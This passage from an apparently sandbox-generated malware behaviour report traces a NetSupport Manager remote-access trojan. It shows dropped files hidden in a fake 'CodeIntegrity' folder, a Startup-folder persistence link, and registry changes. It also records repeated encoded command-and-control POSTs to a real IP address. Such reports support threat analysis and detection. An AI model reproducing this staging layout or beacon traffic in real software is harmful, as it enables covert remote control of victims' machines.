- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\Nbctl32.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA0.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA1.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA2.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA3.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA4.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA5.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA6.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NBCTLA7.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.inf",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nskbfltr.sys",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.ini",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSM.LIC",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nsmexec.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.inf",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\nspscr.sys",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\NSToast.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicapi.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcicfgui.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICHEK.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCICL32.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pciconn.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcigina.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIHOOKS.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIinv.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMON.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcimonhook.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIMSG.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pcisys.sys",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\PCIVDD.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\pscrinst.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\remcmdstub.exe",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\shfolder.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCBR32.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\TCCTL32.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\VolumeControlWXP.DLL",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\WdfCoInstaller01005.dll",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini.lnk",
- "C:\\Users\\user\\AppData\\Local\\NetSupport\\NetSupport Manager\\Host_HF.bin",
- "\\??\\Scsi0:",
- "\\??\\Scsi1:",
- "\\??\\PIPE\\wkssvc",
- "C:\\Users\\user\\AppData\\Local\\NetSupport\\NetSupport Manager\\Host_SW.bin",
- "C:\\Users\\user\\AppData\\Local\\NetSupport\\NetSupport Manager\\Host_HW.bin",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7fc2b1f9-2cd2-4f46-bdc4-a56cd589e09e",
- "\\??\\NDISTAPI",
- "\\??\\NDProxy",
- "\\Device\\LanmanDatagramReceiver",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC403.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8E6.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC906.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDD6A.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERC403.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERC8E6.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERC906.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\WERDD6A.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\Report.wer.tmp",
- "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h",
- "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl.h",
- "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.ini",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "\\??\\WMIDataDevice"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18222468",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\__tmp_rar_sfx_access_check_18223250",
- "C:\\Users\\user\\AppData\\Roaming\\CodeIntegrity\\WinSupport\\bin\\StoreApp.bin",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC403.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC403.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8E6.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC8E6.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC906.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERC906.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDD6A.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERDD6A.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0543f88a\\Report.wer.tmp",
- "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl.h",
- "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\tapi32",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Tracing\\tapi32\\FileDirectory",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@\"%windir%\\System32\\ie4uinit.exe\",-738",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\tapisrv",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\tapisrv\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\DomainName",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Tracing\\NDPTSP",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\EnableFileTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\EnableConsoleTracing",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\FileTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\ConsoleTracingMask",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\MaxFileSize",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Tracing\\NDPTSP\\FileDirectory",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\Perf1",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\Perf2",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities\\MediaModes",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\Path",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\Hash",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows Defender\\MP Scheduled Scan\\Id",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Microsoft\\Windows Defender\\MP Scheduled Scan\\Index",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\Triggers",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\7FC2B1F9-2CD2-4F46-BDC4-A56CD589E09E\\DynamicInfo",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-00000000-0000-0000-0000-000000000000",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dllMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.muiMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sysACPIMOFResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.muiACPIMOFResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sysMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.muiMofResourceName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sysMofResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.muiMofResource",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sysHDAudioMofName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.muiHDAudioMofName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\intelppm.sysPROCESSORWMI",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\intelppm.sys.muiPROCESSORWMI",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\portcls.SYSPortclsMof",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\System32\\Drivers\\en-US\\portcls.SYS.muiPortclsMof",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
- * Deleted Registry Keys:
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Telephony\\TAPISRVSCPGUID",
- "HKEY_USERS\\S-1-5-21-0000000000-0000000000-0000000000-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Telephony\\HandoffPriorities\\RequestMediaCall",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\monitor.sysMonitorWMI"
- * DNS Communications:
- "type": "A",
- "request": "geo.netsupportsoftware.com",
- "answers":
- "data": "62.172.138.35",
- "type": "A"
- "data": "geograph.netsupportsoftware.com",
- "type": "CNAME"
- "data": "195.171.92.116",
- "type": "A"
- * Domains:
- "ip": "195.171.92.116",
- "domain": "geo.netsupportsoftware.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "CMD=POLL\nINFO=1\nACK=1\n",
- "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "5.45.73.63",
- "version": "1.1",
- "path": "http://5.45.73.63/fakeurl.htm",
- "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
- "port": 4151
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3\\xc6v\\x14N\\xc4\\xd9\\xa5\\xc96\\x8c\\x17\\x90\\xb3\\xf1\\x1b|\\xbb\\xb4\\x0f\\x1ae\\xe79\\x92\\xe4\\x1a\\xdb\\xbcO\\xd0D\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "5.45.73.63",
- "version": "1.1",
- "path": "http://5.45.73.63/fakeurl.htm",
- "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\x99\\xc3\\xda\\xcel\\xd7\\\\xe7\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4j\\x94_mb\\xfd\\xaf\\xa3\\xc6v\\x14N\\xc4\\xd9\\xa5\\xc96\\x8c\\x17\\x90\\xb3\\xf1\\x1b|\\xbb\\xb4\\x0f\\x1ae\\xe79\\x92\\xe4\\x1a\\xdb\\xbcO\\xd0D\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
- "port": 4151
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
- "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "5.45.73.63",
- "version": "1.1",
- "path": "http://5.45.73.63/fakeurl.htm",
- "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 76\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$Cj_\\x8e\\xf9\\xfb\\xd0\\xb8\\xc5\\xd6\\xf70Mt\\xa4\\xc1s\\xac\\xb3\\xdfM\\xdb6\\xb3\\xa1\n",
- "port": 4151
- "count": 1,
- "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "5.45.73.63",
- "version": "1.1",
- "path": "http://5.45.73.63/fakeurl.htm",
- "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
- "port": 4151
- "count": 1,
- "body": "",
- "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
- "user-agent": "",
- "method": "GET",
- "host": "geo.netsupportsoftware.com",
- "version": "1.1",
- "path": "/location/loca.asp",
- "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- "count": 42,
- "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "uri": "http://5.45.73.63:4151/http://5.45.73.63/fakeurl.htm",
- "user-agent": "NetSupport Manager/1.3",
- "method": "POST",
- "host": "5.45.73.63",
- "version": "1.1",
- "path": "http://5.45.73.63/fakeurl.htm",
- "data": "POST http://5.45.73.63/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 5.45.73.63\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
- "port": 4151
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment